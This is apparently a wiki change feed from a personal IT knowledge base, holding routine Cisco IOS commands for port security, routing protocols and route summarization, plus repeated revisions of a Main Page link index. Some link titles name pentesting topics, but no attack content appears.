=== Enable sticky mode to automatically learn mac addresses ===&lt;br /&gt;
 switchport port-security mac-address sticky&lt;br /&gt;
&lt;br /&gt;
=== Port Security Violation Modes ===&lt;br /&gt;
==== Protect ====&lt;br /&gt;
Silently drops packets from unknown MAC addresses while keeping the port up and generating no alerts.&lt;br /&gt;
 switchport port-security violation protect&lt;br /&gt;
&lt;br /&gt;
==== Restrict ====&lt;br /&gt;
Drops packets from unknown MAC addresses and logs the violation while incrementing the security counter.&lt;br /&gt;
 switchport port-security violation restrict&lt;br /&gt;
&lt;br /&gt;
==== Shutdown ====&lt;br /&gt;
Immediately disables the port when an unknown MAC address is detected, placing it into an error-disabled state.&lt;br /&gt;
 switchport port-security violation shutdown&lt;br /&gt;
&lt;br /&gt;
=== Port Security Aging ===&lt;br /&gt;
==== Enable static aging on an interface ====&lt;br /&gt;
 switchport port-security aging static&lt;br /&gt;
&lt;br /&gt;
==== Enable timed aging on an interface (5 minutes) ====&lt;br /&gt;
 switchport port-security aging time 5&lt;br /&gt;
&lt;br /&gt;
= Routing =&lt;br /&gt;
&lt;br /&gt;
Routing is the process of forwarding packets between different networks using routing tables and routing protocols.&lt;br /&gt;
&lt;br /&gt;
=== Enable IP Routing (Layer 3 Switch) ===&lt;br /&gt;
Required on multilayer switches to allow routing between VLANs.&lt;br /&gt;
&lt;br /&gt;
 ip routing&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
== Static Routing ==&lt;br /&gt;
&lt;br /&gt;
=== Configure a Static Route ===&lt;br /&gt;
Manually define a path to a remote network.&lt;br /&gt;
&lt;br /&gt;
 ip route 192.168.2.0 255.255.255.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
Format:&lt;br /&gt;
 ip route &amp;lt;destination-network&amp;gt; &amp;lt;subnet-mask&amp;gt; &amp;lt;next-hop-ip&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure a Default Route / Default Gateway ===&lt;br /&gt;
Route used when no specific route matches the destination.&lt;br /&gt;
&lt;br /&gt;
 ip route 0.0.0.0 0.0.0.0 192.168.1.1&lt;br /&gt;
&lt;br /&gt;
== Dynamic Routing ==&lt;br /&gt;
&lt;br /&gt;
Dynamic routing protocols automatically exchange routing information between routers.&lt;br /&gt;
&lt;br /&gt;
=== Configure RIP v2 ===&lt;br /&gt;
Uses hop count as metric (maximum 15 hops).&lt;br /&gt;
&lt;br /&gt;
 router rip&lt;br /&gt;
  version 2&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure EIGRP ===&lt;br /&gt;
Uses bandwidth and delay as composite metric.&lt;br /&gt;
&lt;br /&gt;
 router eigrp 100&lt;br /&gt;
  no auto-summary&lt;br /&gt;
  network 192.168.1.0 0.0.0.255&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure OSPF ===&lt;br /&gt;
Link-state protocol using cost as metric.&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  network 192.168.1.0 0.0.0.255 area 0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Route Summarization ==&lt;br /&gt;
&lt;br /&gt;
Route summarization (aggregation) reduces routing table size by advertising one route that represents multiple networks.&lt;br /&gt;
&lt;br /&gt;
Example networks:&lt;br /&gt;
 192.168.0.0/24&lt;br /&gt;
 192.168.1.0/24&lt;br /&gt;
 192.168.2.0/24&lt;br /&gt;
 192.168.3.0/24&lt;br /&gt;
&lt;br /&gt;
Can be summarized as:&lt;br /&gt;
 192.168.0.0/22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (EIGRP) ===&lt;br /&gt;
Applied on the outgoing interface.&lt;br /&gt;
&lt;br /&gt;
 interface GigabitEthernet0/0&lt;br /&gt;
  ip summary-address eigrp 100 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Configure Manual Summarization (OSPF ABR) ===&lt;br /&gt;
Configured under the OSPF process (on an ABR).&lt;br /&gt;
&lt;br /&gt;
 router ospf 1&lt;br /&gt;
  area 0 range 192.168.0.0 255.255.252.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Administrative Distance ==&lt;br /&gt;
&lt;br /&gt;
Determines which route is preferred when multiple routes to the same destination exist.&lt;br /&gt;
&lt;br /&gt;
Common values:&lt;br /&gt;
 Connected – 0&lt;br /&gt;
 Static – 1&lt;br /&gt;
 EIGRP – 90&lt;br /&gt;
 OSPF – 110&lt;br /&gt;
 RIP – 120&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Show Routing Information ==&lt;br /&gt;
&lt;br /&gt;
=== View Routing Table ===&lt;br /&gt;
&lt;br /&gt;
 show ip route&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Specific Route ===&lt;br /&gt;
&lt;br /&gt;
 show ip route 192.168.1.0&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== View Routing Protocol Information ===&lt;br /&gt;
&lt;br /&gt;
 show ip protocols&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1114</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1114"/>
		<updated>2026-02-23T19:37:08Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]] | [https://en.wikipedia.org/wiki/VLAN_hopping Wikipedia - Vlan Hopping]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1113</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1113"/>
		<updated>2026-02-23T19:36:51Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]] [[https://en.wikipedia.org/wiki/VLAN_hopping Wikipedia - Vlan Hopping]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1112</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1112"/>
		<updated>2026-02-23T19:36:36Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]] [https://en.wikipedia.org/wiki/VLAN_hopping Wikipedia - Vlan Hopping]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1111</id>
		<title>Main Page</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Main_Page&amp;diff=1111"/>
		<updated>2026-02-23T19:27:16Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;strong&amp;gt;Welcome to Lucca&#039;s Knowledgebase&amp;lt;/strong&amp;gt;&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Windows: |&lt;br /&gt;
[[Commands]] | [[Win+R Shortcuts]] | [[Windows Keyboard Shortcuts]] | [[Remote Desktop Setup]] | [[End of Life]] | [[Make CMD Open Faster on Windows 11]] | [[Hyper-V on Windows Home]] | [[Domain Setup from Scratch on Server Core]] | [[Example User onboarding &amp;amp; offboarding Scripts for 365]] | [[Keyboard Navigation Scripts]] | [[Registry Tweaks/Fixes]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Linux: | [[Distro Download Links]] | [[Linux Commands|Commands]] | [[Docker-Compose]] | [[Bashrc/Zshrc Setup]] | [https://arachnoid.com/SecureShell/index.html Arachnoid.com: How to use SSH] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/How%20to%20Use%20Secure%20Shell.pdf pdf] | [[Libvirt Setup]] | [[VFIO GPU Passthrough Setup]] | [[VFIO Anti-Cheat Bypass Tools]] | [[Xubuntu Mac Conversion Guide]] | [[Ungoogled Chromium Debian]] | [[Docker Installation on Debian]] | [[Infared Reciever w/ Alpine on the Bulldozer Datto]] | [[Numpad hotkeys on linux]] | [[Split a monitor in two]] | [[Make a udev rule]] | [[Type Unicode Characters]] | [[Screen Recording Options]] | [[Microsoft Authenticator]] | [https://www.debugpoint.com/kvm-share-folder-windows-guest/ Setup A Share Folder between a Linux host and Windows Guest] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Share%20Folder%20Between%20Windows%20Guest%20and%20Linux%20Host%20in%20KVM%20using%20virtiofs.pdf pdf] | [[Perform actions based on notification content]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pentesting: | [[Performing a SYN flood attack]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
MacOS: | [[OSX Commands]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Javascript: | [[VM Userscript to disable website right-click and copy-blocking]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Python: | [[Math Operators]] | [[Python Examples|Examples]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Cisco: | [[Cisco Commands|Commands]] | [[Cisco Keyboard Shortcuts|Keyboard Shortcuts]] | [[Example configuration files]] | [[Ethernet: Straight-through VS Crossover Cable]] | [https://en.wikipedia.org/wiki/Path_MTU_Discovery Path MTU Discovery] | [[ipv6]] | [[802.1q]] (Vlan Tagging) | [[WAP Arrangement]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Robotics: | [[Nao Robot]]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Retro Tech: |&lt;br /&gt;
[[Analog Video Articles]] | [[Modeline Generators]] | [https://github.com/antonioginer/ATOM-15 ATOM-15: AMD/ATI Card 15khz bios] | [https://luigiblood.tumblr.com/post/711882982704726016/everything-datamined-about-gba-nso-so-far Deep Dive into Nintendo Switch NSO GBA Link Cable Emulation] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/Yakumono&#039;s%20Blog_%20Everything%20datamined%20about%20GB_A%20NSO%20so%20far..pdf pdf]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Digital Archives: |&lt;br /&gt;
[https://archive.org archive.org] | [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes kirb.feels archive] [https://en.wikipedia.org/wiki/Library_Genesis Library Genesis]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Open Source Intelligence: | &lt;br /&gt;
[https://osintframework.com/ OsINT Framework] | [https://www.usphonebook.com/ USPhoneBook]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;br /&gt;
&lt;br /&gt;
[https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/YdGUYXws5mD2fxFKxg.webp ☕Happy Monday =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/giphy.webp ☕Bom Dia =D] [https://kirbfeels.luccapirovano.com/library/ArchivalPurposes/wiki-files/happy%20monday/tenor.gif ☕??????]&lt;br /&gt;
&lt;br /&gt;
&amp;lt;hr&amp;gt;&lt;/div&gt;</summary>
		<author><name>50.220.241.211</name></author>
	</entry>
	<entry>
		<id>https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1077</id>
		<title>Cisco Commands</title>
		<link rel="alternate" type="text/html" href="https://wiki.luccapirovano.com/index.php?title=Cisco_Commands&amp;diff=1077"/>
		<updated>2026-02-05T18:48:48Z</updated>

		<summary type="html">&lt;p&gt;50.220.241.211: /* Trunk Native VLANs */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Cisco IOS Command Reference =&lt;br /&gt;
&lt;br /&gt;
A quick-reference guide for common Cisco IOS commands on switches and routers.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== System &amp;amp; Routing Basics ==&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv4 Routing (Layer 3 Switches) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ip routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Enable IPv6 Routing (Routers) ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
ipv6 unicast-routing&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Device &amp;amp; System Information ==&lt;br /&gt;
&lt;br /&gt;
=== Show MAC Address Table ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show mac address-table&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show OS and Device Version ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show version&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Logged-in Users ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show users&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Files ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
dir&lt;br /&gt;
dir nvram:&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
== Configuration Files ==&lt;br /&gt;
&lt;br /&gt;
=== Show Configurations ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show running-config&lt;br /&gt;
show startup-config&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Show Interface Config ===&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
show run interface g0/0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Filter Running Config (grep-like) ===&lt;br /&gt;
